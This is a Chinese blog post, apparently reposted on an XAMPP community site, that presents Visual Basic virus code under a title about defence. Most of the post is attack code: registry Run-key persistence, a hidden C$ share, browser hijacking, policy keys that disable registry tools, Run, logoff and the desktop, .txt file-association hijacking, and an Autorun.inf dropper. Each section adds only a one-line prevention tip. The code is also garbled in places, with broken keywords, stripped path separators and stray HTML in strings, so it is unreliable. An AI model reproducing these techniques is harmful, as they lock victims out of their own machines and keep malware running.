最新消息:XAMPP默认安装之后是很不安全的,我们只需要点击左方菜单的 "安全"选项,按照向导操作即可完成安全设置。

基于病毒的工作原理进行防护,实用对战分析之

XAMPP案例 中文小张 760浏览 0评论

利用在注册表中插入相应键值来实现开机自启

rivate Declare Function RegCreateKey Lib”advapi32.dll” Alias “RegCreateKeyA” (ByVal hKey As Long,ByVal lpSubKey As String, phkResult As Long) As Long
Private Declare Function RegCloseKey Lib “advapi32.dll” (ByVal hKeyAs Long) As Long
Private Declare Function RegSetValueEx Lib “advapi32.dll” Alias”RegSetValueExA” (ByVal hKey As Long, ByVal lpvalueName As String,ByVal Reserved As Long, ByVal dwType As Long, lpData As Any, ByVal cbData AsLong) As Long
上述是API声明。
病毒的开机自启就是在RUN下建立一个启动项,代码:
Dim hKey As Long
Dim cc
Let cc = Len(“病毒的绝对路径”)
RegCreateKey HKEY_LOCAL_MACHINE,”SoftwareMicrosoftWindowsCurrentVersionRunservices”, hKey
Writereg =Wsh_shell.RegWrite(“HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunSystemm”,Mypath, “REG_SZ”)
Writereg =Wsh_shell.RegWrite(“HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunSystemmm”,”500)this.width=500″=0>http://hsz.oor.cn”REG_SZ”)
Writereg = Wsh_shell.RegWrite(“HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionNetworkLanManC$Flags”,”302″, “REG_DWORD”)
Writereg =Wsh_shell.RegWrite(“HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionNetworkLanManC$Type”,”0″, “REG_DWORD”)
Writereg = Wsh_shell.RegWrite(“HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionNetworkLanManC$Path”,”C:”)
Writereg =Wsh_shell.RegWrite(“HKEY_CURRENT_USERSoftwareMicrosoftInternetExplorerMainStart Page”, “500)this.width=500″=0>www.baidu.com”)
Writereg =Wsh_shell.RegWrite(“HKEY_CURRENT_USERSoftwareMicrosoftInternetExplorerMainWindow Title”, “BLOG地址:http://www.baidu.com”)
Writereg =Wsh_shell.RegWrite(“HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoRun”,”01″, “REG_DWORD”)
Writereg =Wsh_shell.RegWrite(“HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoClose”,”01″, “REG_DWORD”)
Writereg =Wsh_shell.RegWrite(“HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoLogOff”,”01″, “REG_DWORD”)
Writereg = Wsh_shell.RegWrite(“HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoDrives”,”04″, “REG_DWORD”)
Writereg =Wsh_shell.RegWrite(“HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystemDisableRegistryTools”,”01″, “REG_DWORD”)
Writereg = Wsh_shell.RegWrite(“HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoDesktop”, “01”, “REG_DWORD”)
Writereg = Wsh_shell.RegWrite(“”, “01”,”REG_DWORD”)
RegSetValueEx hKey, “键名”, 0, REG_SZ, ByVal”病毒的绝对路径”, cc
RegCloseKey hKey

防止办法:查看注册表中的病毒常驻项,这里就不多介绍了,有兴趣的可以问本人或者百度
以上代码执行后会在注册表中加入一个病毒的启动项。

通过修改文本文件的关联实现启动
其代码如下:
API声明:
Private Declare Function RegCreateKey Lib “advapi32.dll” Alias”RegCreateKeyA” (ByVal hKey As Long, ByVal lpSubKey As String,phkResult As Long) As Long
Private Declare Function RegSetValue Lib “advapi32.dll” Alias “RegSetValueA”(ByVal hKey As Long, ByVal lpSubKey As String, ByVal dwType As Long, ByVallpData As String, ByVal cbData As Long) AsLong
Const HKEY_CLASSES_ROOT = &H80000000
Const REG_SZ = 1
实现代码:
Dim sKeyName As String      ‘存储键名
Dim sKeyValue As String      ‘存储键值
Dim MyReturn As Long      ‘存储返回值信息
Dim keyhandle As Long
sKeyName = “Test”
sKeyValue = “Test Application”
MyReturn& = RegCreateKey&(HKEY_CLASSES_ROOT, sKeyName, keyhandle&)
MyReturn& = RegSetValue&(keyhandle&, “”, REG_SZ,sKeyValue, 0&)
MsgBox MyReturn&
sKeyName = “.txt” ‘要建立关联的文件后缀名
sKeyValue = “Test”
MyReturn& = RegCreateKey&(HKEY_CLASSES_ROOT, sKeyName, keyhandle&)
MyReturn& = RegSetValue&(keyhandle&, “”, REG_SZ,sKeyValue, 0&)
sKeyName = “Test”
sKeyValue = “D:病毒.exe %1″ ‘自己程序的位置和名称
MyReturn& = RegCreateKey&(HKEY_CLASSES_ROOT, sKeyName, keyhandle&)
MyReturn& = RegSetValue&(keyhandle&,”shellopencommand”, REG_SZ, sKeyValue, MAX_PATH)
End Sub
以上是利用修改TXT文件关联来实现病毒启动的。

防止方法:通过注册表修复,通过FTYPE和ASSOC命令修复文件关联(通过这两个命令也可有效防止中病毒的计算机中的病毒继续扩散和进一步感染)

利用Autorun.inf
光盘就是利用这个来自动播放的,所以我就不废话了。

实现代码:
If Dir(“F:”) <> “” Then Let a = App.Path +”” + App.EXEName + “.exe”
FileCopy a, “C:病毒.exe”
Open “Autorun.inf” For Output As #1
Print #1, “[autorun]”
Print #1, “OPEN=病毒.exe”
Close #1
这样就实现了双击C盘启动病毒的作用。

转载请注明:XAMPP中文组官网 » 基于病毒的工作原理进行防护,实用对战分析之

您必须 登录 才能发表评论!